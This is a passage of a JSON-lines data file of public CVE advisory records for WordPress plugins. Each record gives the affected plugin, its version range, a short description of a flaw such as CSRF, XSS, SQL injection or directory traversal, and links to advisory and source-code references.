\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/tags\\\/1.5.3\\\/includes\\\/api\\\/class-api-order-controller.php#L175\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36757","slug":"wp-hotel-booking","versionImpact":"1.10.1","description":"The WP Hotel Booking plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.10.1. This is due to missing or incorrect nonce validation on the admin_add_order_item() function. This makes it possible for unauthenticated attackers to add an order item via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9826d7-f8f5-4d3d-8145-3d4e6a63d784?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd9826d7-f8f5-4d3d-8145-3d4e6a63d784?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368289%40wp-hotel-booking&new=2368289%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368289%40wp-hotel-booking&new=2368289%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46154","slug":"e2pdf","versionImpact":"1.20.18","description":"Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf \u2013 Export To Pdf Tool for WordPress.This issue affects E2Pdf \u2013 Export To Pdf Tool for WordPress: from n\/a through 1.20.18.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-18-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/e2pdf\\\/wordpress-e2pdf-plugin-1-20-18-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1649","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxDeleteCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1413","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Timer widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f40956e0-6e5c-4965-84f8-2420ad14a299?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8793","slug":"woocommerce-exporter","versionImpact":"2.7.2.1","description":"The Store Exporter for WooCommerce \u2013 Export Products, Export Orders, Export Subscriptions, and More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.2.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3c44eb-ef25-43f5-a872-6ef52c3d9c1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d3c44eb-ef25-43f5-a872-6ef52c3d9c1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-exporter\\\/tags\\\/2.7.2.1\\\/includes\\\/settings.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-exporter\\\/tags\\\/2.7.2.1\\\/includes\\\/settings.php#L195\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11683","slug":"newsletter-subscriptions","versionImpact":"2.1","description":"The Newsletter Subscriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'token_type' parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter-subscriptions\\\/newsletter_subcriptions.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter-subscriptions\\\/newsletter_subcriptions.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0d1427-d01e-4054-8ba7-59d6878cfbea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0d1427-d01e-4054-8ba7-59d6878cfbea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13318","slug":"essential-wp-real-estate","versionImpact":"1.1.3","description":"The Essential WP Real Estate plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the cl_delete_listing_func() function in all versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to delete arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-wp-real-estate\\\/trunk\\\/src\\\/Common\\\/Ajax\\\/Ajax.php#L724\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-wp-real-estate\\\/trunk\\\/src\\\/Common\\\/Ajax\\\/Ajax.php#L724\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a1a9e22-d174-43fc-aab6-f6968067a290?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a1a9e22-d174-43fc-aab6-f6968067a290?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13596","slug":"wp-survey-and-poll","versionImpact":"1.7.5","description":"The WordPress Survey & Poll \u2013 Quiz, Survey and Poll Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'survey' shortcode in all versions up to, and including, 1.7.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L1457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L1457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996cb291-692d-4892-a3ab-ffad960ba732?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996cb291-692d-4892-a3ab-ffad960ba732?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13687","slug":"team-display","versionImpact":"1.3","description":"The Team Builder \u2013 Meet the Team plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_team_builder_options() function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-display\\\/tags\\\/1.3\\\/plugin.class.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-display\\\/tags\\\/1.3\\\/plugin.class.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c35e20f-bfb0-4de0-9f8f-6e04fbbe138a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c35e20f-bfb0-4de0-9f8f-6e04fbbe138a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1572","slug":"kivicare-clinic-management-system","versionImpact":"3.6.7","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the \u2018u_id\u2019 parameter in all versions up to, and including, 3.6.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with doctor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3245759\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCPatientController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kivicare-clinic-management-system\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kivicare-clinic-management-system\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6b0c35-b478-4616-a708-1fd243c95c14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6b0c35-b478-4616-a708-1fd243c95c14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2805","slug":"order-post","versionImpact":"2.0.2","description":"The ORDER POST plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/order-post\\\/trunk\\\/wp_post_order.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/order-post\\\/trunk\\\/wp_post_order.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/order-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ea739-5ee9-4779-87d5-3f13b11229cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ea739-5ee9-4779-87d5-3f13b11229cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3878","slug":"sms-alert","versionImpact":"3.8.1","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_verify shortcode in all versions up to, and including, 3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/helper\\\/shortcode.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sms-alert\\\/tags\\\/3.8.0\\\/helper\\\/shortcode.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sms-alert\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85461b7-6d16-435c-a149-ad25419a1585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85461b7-6d16-435c-a149-ad25419a1585?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6537","slug":"namasha-by-mdesign","versionImpact":"1.2.00","description":"The Namasha By Mdesign plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018playicon_title\u2019 parameter in all versions up to, and including, 1.2.00 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/namasha-by-mdesign\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/namasha-by-mdesign\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7616d0-7b42-4b2e-8378-18c24c7bf22b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f7616d0-7b42-4b2e-8378-18c24c7bf22b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0150","slug":"cloak-front-end-email","versionImpact":"1.9.1","description":"The Cloak Front End Email WordPress plugin through 1.9.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517154dc-d6bd-462d-b955-061a7b7f8da5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517154dc-d6bd-462d-b955-061a7b7f8da5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0762","slug":"clock-in-portal","versionImpact":"2.1","description":"The Clock In Portal- Staff & Attendance Management WordPress plugin through 2.1 does not have CSRF check when deleting designations, which could allow attackers to make logged in admins delete arbitrary designations via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9be952e0-d8ae-440f-8819-cb19485f35f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9be952e0-d8ae-440f-8819-cb19485f35f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36756","slug":"wd-google-analytics","versionImpact":"1.2.8","description":"The 10WebAnalytics plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.8. This is due to missing or incorrect nonce validation on the create_csv_file() function. This makes it possible for unauthenticated attackers to create a CSV file via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2371142%40wd-google-analytics&new=2371142%40wd-google-analytics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2371142%40wd-google-analytics&new=2371142%40wd-google-analytics&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db29f17d-1d2b-4f78-a78d-1579e2a5d975?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db29f17d-1d2b-4f78-a78d-1579e2a5d975?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5153","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.15","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.7.15 via the 'dropzone_hash' parameter. This makes it possible for unauthenticated attackers to copy the contents of arbitrary files on the server, which can contain sensitive information, and to delete arbitrary directories, including the root WordPress directory.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baa20290-9c01-4f8d-adeb-fbfb15b9d6a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baa20290-9c01-4f8d-adeb-fbfb15b9d6a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/widgets\\\/dropzone_form_field.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/widgets\\\/dropzone_form_field.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8786","slug":"auto-featured-image-from-title","versionImpact":"2.3","description":"The Auto Featured Image from Title plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2bf6102-458f-4930-8880-baa96afb1c15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2bf6102-458f-4930-8880-baa96afb1c15?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image-from-title\\\/trunk\\\/auto-featured-image-from-title.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image-from-title\\\/trunk\\\/auto-featured-image-from-title.php#L822\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51702","slug":"truenorth-srcset","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Benjamin Moody, Eric Holmes SrcSet Responsive Images for WordPress allows Reflected XSS.This issue affects SrcSet Responsive Images for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/truenorth-srcset\\\/wordpress-srcset-responsive-images-for-wordpress-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/truenorth-srcset\\\/wordpress-srcset-responsive-images-for-wordpress-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11443","slug":"debranding","versionImpact":"1.0.2","description":"The de:branding plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the debranding_save() function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debranding\\\/trunk\\\/classes\\\/class-debrand-ajax.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a827cea5-e8c2-47dd-81d7-e3700c19c8da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a827cea5-e8c2-47dd-81d7-e3700c19c8da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
